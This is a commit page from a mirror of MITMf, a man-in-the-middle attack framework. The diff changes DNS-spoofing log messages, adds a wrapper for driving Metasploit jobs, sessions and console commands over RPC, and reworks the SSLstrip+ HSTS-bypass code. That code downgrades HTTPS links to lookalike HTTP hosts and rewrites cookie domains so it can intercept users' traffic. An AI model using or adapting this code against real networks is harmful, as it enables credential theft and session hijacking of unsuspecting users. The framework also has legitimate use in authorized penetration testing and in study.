github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-07 21:42:17 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Fixed a bug in SSLstrip+ code, when redirecting to certain sites

Browse source 
Created a wrapper class around Msfrpc to limit code re-use when interacting with msf
This commit is contained in:
byt3bl33d3r 2015-05-19 00:00:40 +02:00
parent b9371f7cdc
commit 563a8d37c1
10 changed files with 141 additions and 126 deletions
Download patch file Download diff file Expand all files Collapse all files

14
core/dnschef/DNSchef.py
View file

@ -71,7 +71,7 @@ class DNSHandler():
d = DNSRecord.parse(data)
except Exception, e:
dnschef_logger.info("{} ERROR: invalid DNS request".format(self.client_address[0]))
dnschef_logger.info("{} [DNSChef] Error: invalid DNS request".format(self.client_address[0]))
else:
# Only Process DNS Queries
@ -115,7 +115,7 @@ class DNSHandler():
# Create a custom response to the query
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
dnschef_logger.info("{} cooking the response of type '{}' for {} to {}".format(self.client_address[0], qtype, qname, fake_record))
dnschef_logger.info("{} [DNSChef] Cooking the response of type '{}' for {} to {}".format(self.client_address[0], qtype, qname, fake_record))
# IPv6 needs additional work before inclusion:
if qtype == "AAAA":
@ -184,7 +184,7 @@ class DNSHandler():
response = response.pack()
elif qtype == "*" and not None in fake_records.values():
dnschef_logger.info("{} cooking the response of type '{}' for {} with {}".format(self.client_address[0], "ANY", qname, "all known fake records."))
dnschef_logger.info("{} [DNSChef] Cooking the response of type '{}' for {} with {}".format(self.client_address[0], "ANY", qname, "all known fake records."))
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q)
@ -259,7 +259,7 @@ class DNSHandler():
# Proxy the request
else:
dnschef_logger.debug("[DNSChef] {} proxying the response of type '{}' for {}".format(self.client_address[0], qtype, qname))
dnschef_logger.debug("{} [DNSChef] Proxying the response of type '{}' for {}".format(self.client_address[0], qtype, qname))
nameserver_tuple = random.choice(nameservers).split('#')
response = self.proxyrequest(data, *nameserver_tuple)
@ -339,13 +339,13 @@ class DNSHandler():
sock.close()
except Exception, e:
dnschef_logger.warning("could not proxy request: {}".format(e))
dnschef_logger.warning("[DNSChef] Could not proxy request: {}".format(e))
else:
return reply
def hstsbypass(self, real_domain, fake_domain, nameservers, d):
dnschef_logger.info("{} resolving '{}' to '{}' for HSTS bypass".format(self.client_address[0], fake_domain, real_domain))
dnschef_logger.info("{} [DNSChef] Resolving '{}' to '{}' for HSTS bypass".format(self.client_address[0], fake_domain, real_domain))
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
@ -482,7 +482,7 @@ class DNSChef(ConfigWatcher):
self.startUDP()
except socket.error as e:
if "Address already in use" in e:
shutdown("\n[-] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port']))
shutdown("\n[DNSChef] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port']))
# Initialize and start the DNS Server
def startUDP(self):

52
core/msfrpc.py
View file

@ -24,6 +24,9 @@ import msgpack
import logging
import requests
from core.configwatcher import ConfigWatcher
from core.utils import shutdown
logging.getLogger("requests").setLevel(logging.WARNING) #Disables "Starting new HTTP Connection (1)" log message
class Msfrpc:
@ -84,6 +87,55 @@ class Msfrpc:
except:
raise self.MsfAuthError("MsfRPC: Authentication failed")
class Msf:
'''
This is just a wrapper around the Msfrpc class,
prevents a lot of code re-use throught the framework
'''
def __init__(self):
try:
self.msf = Msfrpc({"host": ConfigWatcher.config['MITMf']['Metasploit']['rpcip']})
self.msf.login('msf', ConfigWatcher.config['MITMf']['Metasploit']['rpcpass'])
except Exception as e:
shutdown("[Msfrpc] Error connecting to Metasploit: {}".format(e))
def version(self):
return self.msf.call('core.version')['version']
def jobs(self):
return self.msf.call('job.list')
def jobinfo(self, pid):
return self.msf.call('job.info', [pid])
def killjob(self, pid):
return self.msf.call('job.kill', [pid])
def findpid(self, name):
jobs = self.jobs()
for pid, jobname in jobs.iteritems():
if name in jobname:
return pid
return None
def sessions(self):
return self.msf.call('session.list')
def sessionsfrompeer(self, peer):
sessions = self.sessions()
for n, v in sessions.iteritems():
if peer in v['tunnel_peer']:
return n
return None
def sendcommand(self, cmd):
#Create a virtual console
console_id = self.msf.call('console.create')['id']
#write the cmd to the newly created console
self.msf.call('console.write', [console_id, cmd])
if __name__ == '__main__':
# Create a new instance of the Msfrpc client with the default options

8
core/sslstrip/ClientRequest.py
View file

@ -69,7 +69,7 @@ class ClientRequest(Request):
if self.hsts:
if 'referer' in headers:
real = self.urlMonitor.getHstsConfig()[0]
real = self.urlMonitor.real
if len(real) > 0:
dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
@ -120,7 +120,7 @@ class ClientRequest(Request):
client = self.getClientIP()
path = self.getPathFromUri()
url = 'http://' + host + path
self.uri = url # set URI to absolute
self.uri = url # set URI to absolute
if self.content:
self.content.seek(0,0)
@ -129,8 +129,8 @@ class ClientRequest(Request):
if self.hsts:
host = self.urlMonitor.URLgetRealHost(str(host))
real = self.urlMonitor.getHstsConfig()[0]
host = self.urlMonitor.URLgetRealHost(str(host))
real = self.urlMonitor.real
patchDict = self.urlMonitor.patchDict
url = 'http://' + host + path
self.uri = url # set URI to absolute

6
core/sslstrip/SSLServerConnection.py
View file

@ -16,7 +16,9 @@
# USA
#
import logging, re, string
import logging
import re
import string
from ServerConnection import ServerConnection
from URLMonitor import URLMonitor
@ -58,7 +60,7 @@ class SSLServerConnection(ServerConnection):
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
mitmf_logger.debug("[SSLServerConnection][HSTS] Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.getHstsConfig()[1]
real = self.urlMonitor.real
if dominio in real:
v=" Domain=%s"%real[dominio]
mitmf_logger.debug("[SSLServerConnection][HSTS] New cookie domain parameter: %s"%v)

10
core/sslstrip/ServerConnection.py
View file

@ -105,7 +105,13 @@ class ServerConnection(HTTPClient):
def connectionMade(self):
mitmf_logger.debug("[ServerConnection] HTTP connection made.")
self.clientInfo = hap.simple_detect(self.headers['user-agent'])
try:
self.clientInfo = hap.simple_detect(self.headers['user-agent'])
except KeyError as e:
mitmf_logger.debug("[ServerConnection] Client didn't send UA with request")
self.clientInfo = None
pass
self.plugins.hook()
self.sendRequest()
self.sendHeaders()
@ -214,9 +220,7 @@ class ServerConnection(HTTPClient):
nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
mitmf_logger.debug("[ServerConnection][HSTS] Replacing {} => {}".format(url,nuevaurl))
sustitucion[url] = nuevaurl
#data.replace(url,nuevaurl)
#data = self.urlMonitor.DataReemplazo(data)
if len(sustitucion)>0:
dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys()))))
data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)

42
core/sslstrip/URLMonitor.py
View file

@ -32,6 +32,8 @@ class URLMonitor:
# Start the arms race, and end up here...
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
_instance = None
sustitucion = dict()
real = dict()
patchDict = {
'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net',
'https:\/\/www.facebook.com':'http:\/\/social.facebook.com',
@ -107,23 +109,24 @@ class URLMonitor:
port = 443
if self.hsts:
if not self.getHstsConfig[1].has_key(host):
self.updateHstsConfig()
if not self.sustitucion.has_key(host):
lhost = host[:4]
if lhost=="www.":
self.getHstsConfig[1][host] = "w"+host
self.getHstsConfig[0]["w"+host] = host
self.sustitucion[host] = "w"+host
self.real["w"+host] = host
else:
self.getHstsConfig[1][host] = "web"+host
self.getHstsConfig[0]["web"+host] = host
mitmf_logger.debug("[URLMonitor][HSTS] SSL host ({}) tokenized ({})".format(host, self.getHstsConfig[1][host]))
self.sustitucion[host] = "web"+host
self.real["web"+host] = host
mitmf_logger.debug("[URLMonitor][HSTS] SSL host ({}) tokenized ({})".format(host, self.sustitucion[host]))
url = 'http://' + host + path
#mitmf_logger.debug("HSTS stripped URL: %s %s"%(client, url))
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
return 'http://'+ self.getHstsConfig[1][host] + path
return 'http://'+ self.sustitucion[host] + path
else:
url = method + host + path
@ -134,15 +137,10 @@ class URLMonitor:
def setFaviconSpoofing(self, faviconSpoofing):
self.faviconSpoofing = faviconSpoofing
def getHstsConfig(self):
sustitucion = dict()
real = dict()
for k,v in ConfigWatcher.getInstance().getConfig()['SSLstrip+']:
sustitucion[k] = v
real[v] = k
return (real, sustitucion)
def updateHstsConfig(self):
for k,v in ConfigWatcher.getInstance().config['SSLstrip+'].iteritems():
self.sustitucion[k] = v
self.real[v] = k
def setHstsBypass(self):
self.hsts = True
@ -158,10 +156,12 @@ class URLMonitor:
def URLgetRealHost(self, host):
mitmf_logger.debug("[URLMonitor][HSTS] Parsing host: {}".format(host))
if self.getHstsConfig()[0].has_key(host):
mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: {}".format(self.getHstsConfig()[0][host]))
return self.getHstsConfig()[0][host]
self.updateHstsConfig()
if self.real.has_key(host):
mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: {}".format(self.real[host]))
return self.real[host]
else:
mitmf_logger.debug("[URLMonitor][HSTS] Host not in list: {}".format(host))